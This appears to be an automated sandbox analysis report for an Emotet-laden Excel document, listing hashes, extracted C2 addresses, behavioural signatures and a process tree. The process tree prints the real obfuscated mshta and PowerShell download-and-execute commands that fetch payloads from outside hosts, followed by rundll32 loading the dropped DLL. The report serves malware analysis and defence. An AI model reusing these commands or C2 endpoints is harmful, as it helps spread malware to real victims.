Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
19-01-2022 23:50
Behavioral task
behavioral1
Sample
4c047ff42c8f500cad96e6f884ba0d25.xls
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
4c047ff42c8f500cad96e6f884ba0d25.xls
Resource
win10v2004-en-20220112
General
-
Target
4c047ff42c8f500cad96e6f884ba0d25.xls
-
Size
141KB
-
MD5
4c047ff42c8f500cad96e6f884ba0d25
-
SHA1
5654f7e7f9ba6fa83e372bb1eeafd6f446fd78df
-
SHA256
9d1fb84bbcd977c6ff6a873b6485cf44af7d6562fa046b0b751dd1f6bfb2d31a
-
SHA512
eef6aad4076f7698baa848cf32cff46a08125b9e8d06bdb8c3eaa8e886f3da22f3b56096abf16e9c09f34c5bfb43fb0f406aaab96c733574cd0de203716f6ce4
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Extracted
http://185.7.214.7/fer/fer.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3132 2516 cmd.exe EXCEL.EXE -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2280 created 3116 2280 WerFault.exe mshta.exe -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 36 3116 mshta.exe 37 3544 powershell.exe 39 3544 powershell.exe 41 3544 powershell.exe 61 2056 rundll32.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exepid process 2324 rundll32.exe 3012 rundll32.exe 2452 rundll32.exe 2056 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Bkopkncv\dxvpmvay.rkt rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3756 3116 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WerFault.exeEXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2516 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 3544 powershell.exe 3544 powershell.exe 3756 WerFault.exe 3756 WerFault.exe 2056 rundll32.exe 2056 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3544 powershell.exe Token: SeSystemtimePrivilege 2632 svchost.exe Token: SeSystemtimePrivilege 2632 svchost.exe Token: SeIncBasePriorityPrivilege 2632 svchost.exe Token: SeSystemtimePrivilege 2632 svchost.exe Token: SeSystemtimePrivilege 3752 svchost.exe Token: SeSystemtimePrivilege 3752 svchost.exe Token: SeIncBasePriorityPrivilege 3752 svchost.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE 2516 EXCEL.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exeWerFault.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2516 wrote to memory of 116 2516 EXCEL.EXE splwow64.exe PID 2516 wrote to memory of 116 2516 EXCEL.EXE splwow64.exe PID 2516 wrote to memory of 3132 2516 EXCEL.EXE cmd.exe PID 2516 wrote to memory of 3132 2516 EXCEL.EXE cmd.exe PID 3132 wrote to memory of 3116 3132 cmd.exe mshta.exe PID 3132 wrote to memory of 3116 3132 cmd.exe mshta.exe PID 3116 wrote to memory of 3544 3116 mshta.exe powershell.exe PID 3116 wrote to memory of 3544 3116 mshta.exe powershell.exe PID 2280 wrote to memory of 3116 2280 WerFault.exe mshta.exe PID 2280 wrote to memory of 3116 2280 WerFault.exe mshta.exe PID 3544 wrote to memory of 568 3544 powershell.exe cmd.exe PID 3544 wrote to memory of 568 3544 powershell.exe cmd.exe PID 568 wrote to memory of 2324 568 cmd.exe rundll32.exe PID 568 wrote to memory of 2324 568 cmd.exe rundll32.exe PID 568 wrote to memory of 2324 568 cmd.exe rundll32.exe PID 2324 wrote to memory of 3012 2324 rundll32.exe rundll32.exe PID 2324 wrote to memory of 3012 2324 rundll32.exe rundll32.exe PID 2324 wrote to memory of 3012 2324 rundll32.exe rundll32.exe PID 3012 wrote to memory of 2452 3012 rundll32.exe rundll32.exe PID 3012 wrote to memory of 2452 3012 rundll32.exe rundll32.exe PID 3012 wrote to memory of 2452 3012 rundll32.exe rundll32.exe PID 2452 wrote to memory of 2056 2452 rundll32.exe rundll32.exe PID 2452 wrote to memory of 2056 2452 rundll32.exe rundll32.exe PID 2452 wrote to memory of 2056 2452 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4c047ff42c8f500cad96e6f884ba0d25.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:116
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bkopkncv\dxvpmvay.rkt",EnqYXcXi8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bkopkncv\dxvpmvay.rkt",DllRegisterServer9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2056
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3116 -s 17284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:3584
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 4fd802e7119f7e35d9e9554d25f7c904 GkRAjjGHM0u+QhwM/RuLEA.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow1⤵PID:3448
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 3116 -ip 31161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wusvcs -p1⤵PID:3220
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
17f754c0776b7984919b9c1c79f8e35b
SHA188fd90c8d4d73658d26d0d564c322f6ddc614216
SHA256194504260ed20b0959d4890b5e953ec2cdf58af884b4ee8825e5097b32228514
SHA512132fb45f98e265f38c5dd8019b37454076147b0e21bda81d0fbca650bc0bcfaa7970295a63a13ba1956a21cfed25f7e0b38e6807badc1dbaaaf3e086577000ea
-
MD5
17f754c0776b7984919b9c1c79f8e35b
SHA188fd90c8d4d73658d26d0d564c322f6ddc614216
SHA256194504260ed20b0959d4890b5e953ec2cdf58af884b4ee8825e5097b32228514
SHA512132fb45f98e265f38c5dd8019b37454076147b0e21bda81d0fbca650bc0bcfaa7970295a63a13ba1956a21cfed25f7e0b38e6807badc1dbaaaf3e086577000ea
-
MD5
17f754c0776b7984919b9c1c79f8e35b
SHA188fd90c8d4d73658d26d0d564c322f6ddc614216
SHA256194504260ed20b0959d4890b5e953ec2cdf58af884b4ee8825e5097b32228514
SHA512132fb45f98e265f38c5dd8019b37454076147b0e21bda81d0fbca650bc0bcfaa7970295a63a13ba1956a21cfed25f7e0b38e6807badc1dbaaaf3e086577000ea
-
MD5
17f754c0776b7984919b9c1c79f8e35b
SHA188fd90c8d4d73658d26d0d564c322f6ddc614216
SHA256194504260ed20b0959d4890b5e953ec2cdf58af884b4ee8825e5097b32228514
SHA512132fb45f98e265f38c5dd8019b37454076147b0e21bda81d0fbca650bc0bcfaa7970295a63a13ba1956a21cfed25f7e0b38e6807badc1dbaaaf3e086577000ea
-
MD5
17f754c0776b7984919b9c1c79f8e35b
SHA188fd90c8d4d73658d26d0d564c322f6ddc614216
SHA256194504260ed20b0959d4890b5e953ec2cdf58af884b4ee8825e5097b32228514
SHA512132fb45f98e265f38c5dd8019b37454076147b0e21bda81d0fbca650bc0bcfaa7970295a63a13ba1956a21cfed25f7e0b38e6807badc1dbaaaf3e086577000ea